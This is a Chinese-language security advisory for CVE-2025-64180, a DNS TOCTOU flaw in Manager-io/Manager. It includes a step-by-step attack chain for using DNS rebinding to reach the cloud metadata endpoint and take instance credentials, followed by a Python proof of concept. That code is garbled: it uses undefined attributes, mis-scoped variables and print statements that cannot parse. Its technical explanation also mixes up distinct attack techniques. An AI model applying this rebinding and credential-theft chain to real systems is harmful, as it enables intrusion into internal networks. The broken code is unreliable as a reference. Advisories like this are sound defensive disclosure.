CVE-2025-64180: Manager-io/Manager DNS验证TOCTOU漏洞导致网络隔离绕过

漏洞信息

漏洞编号

CVE-2025-64180

漏洞类型

TOCTOU条件竞争/网络隔离绕过

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Manager-io/Manager (Desktop和Server版本)

漏洞概述

CVE-2025-64180是Manager-io/Manager会计软件中的一个严重安全漏洞。该漏洞影响Desktop和Server版本25.11.1.3085及以下版本，CVSS评分高达10.0，属于严重级别。漏洞的根本原因在于DNS验证机制的设计缺陷，存在典型的Time-of-Check Time-of-Use（TOCTOU，检查时间到使用时间）条件竞争问题。攻击者可以利用此漏洞绕过网络隔离限制，未经授权访问内部网络资源、受保护的网段以及云服务元数据端点。值得注意的是，Desktop版本完全不需要任何认证即可利用此漏洞，Server版本也仅需标准认证即可触发。该漏洞由GitHub安全团队发现并报告，官方已在25.11.1.3086版本中修复。

技术细节

该漏洞源于Manager软件在DNS验证过程中的设计缺陷。应用程序在验证主机名时首先检查DNS解析结果，但在实际使用解析结果时存在时间窗口，攻击者可以在此期间通过DNS欺骗等技术将解析结果替换为内部网络地址。具体来说：1）应用程序验证某个域名指向的IP地址为外部地址；2）攻击者等待验证通过后，通过ARP欺骗或DNS缓存投毒等手段将域名解析为内部IP地址；3）应用程序使用被篡改的解析结果访问内部网络资源。这种TOCTOU条件竞争使得原本应该被隔离的外部请求能够访问到内部敏感服务，包括云环境中的元数据端点（169.254.169.254）、内部数据库、API服务等。攻击者利用云元数据端点可以获取实例凭证，从而进一步横向移动获取更高权限。

攻击链分析

STEP 1

步骤1

攻击者注册并控制一个恶意域名，设置自定义DNS服务器

STEP 2

步骤2

DNS服务器首次返回外部IP地址，通过Manager的DNS验证检查

STEP 3

步骤3

Manager验证通过后，DNS服务器切换解析结果为内部IP地址（如169.254.169.254云元数据端点）

STEP 4

步骤4

Manager使用被篡改的解析结果发起请求，绕过网络隔离访问内部资源

STEP 5

步骤5

攻击者从云元数据端点获取实例凭证、API密钥等敏感信息

STEP 6

步骤6

利用获取的凭证进行横向移动，进一步入侵内部系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64180 PoC - Manager-io/Manager DNS TOCTOU Bypass
# This PoC demonstrates the DNS rebinding technique to exploit the TOCTOU vulnerability

import socket
import time
import http.server
import threading
from urllib.parse import urlparse

class DNSRebindingHandler:
    def __init__(self):
        self.first_request = True
        self.attacker_ip = "attacker.controlled.domain"
        self.internal_ip = "169.254.169.254"  # AWS metadata endpoint
    
    def handle_dns(self, query):
        """DNS handler that returns different IPs on first and subsequent requests"""
        if self.first_request:
            self.first_request = False
            return self.external_ip  # Return safe IP for initial check
        return self.internal_ip  # Return internal IP for actual exploit
    
    def start_malicious_server(self):
        """Start HTTP server that triggers internal network access"""
        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                # Craft request that Manager will follow to internal network
                self.send_response(302)
                self.send_header('Location', f'http://{self.internal_ip}/latest/meta-data/')
                self.end_headers()
        
        server = http.server.HTTPServer(('0.0.0.0', 8080), Handler)
        server.serve_forever()

def exploit():
    """
    Exploitation steps:
    1. Attacker controls DNS for malicious domain
    2. First DNS query returns external IP (passes validation)
    3. Subsequent queries return internal IP (169.254.169.254)
    4. Manager follows redirect to internal metadata endpoint
    5. Attacker retrieves cloud credentials from metadata service
    """
    print("["] Starting CVE-2025-64180 exploitation...")
    print("["] Step 1: Register malicious domain with controlled DNS")
    print("["] Step 2: Wait for Manager to validate external IP")
    print("["] Step 3: Switch DNS to point to internal network")
    print("["] Step 4: Manager accesses internal resources via redirect")
    print("["] Step 5: Extract sensitive data from metadata endpoints")
    
    # Note: This is a conceptual PoC. Actual exploitation requires:
    # - Registered domain with custom DNS server
    # - Understanding of Manager's specific DNS validation logic
    # - Network positioning to perform DNS rebinding attack

if __name__ == "__main__":
    exploit()

影响范围

Manager Desktop <= 25.11.1.3085

Manager Server <= 25.11.1.3085

防御指南

临时缓解措施

立即升级Manager至25.11.1.3086版本。如无法立即升级，可采取以下临时措施：1）限制Manager的网络访问权限，仅允许访问必要的外部服务；2）在防火墙层面阻止对内部网络段和云元数据端点的访问；3）启用网络监控和异常检测，及时发现可疑的内部资源访问行为；4）考虑使用VPN或专用网络连接替代直接互联网访问。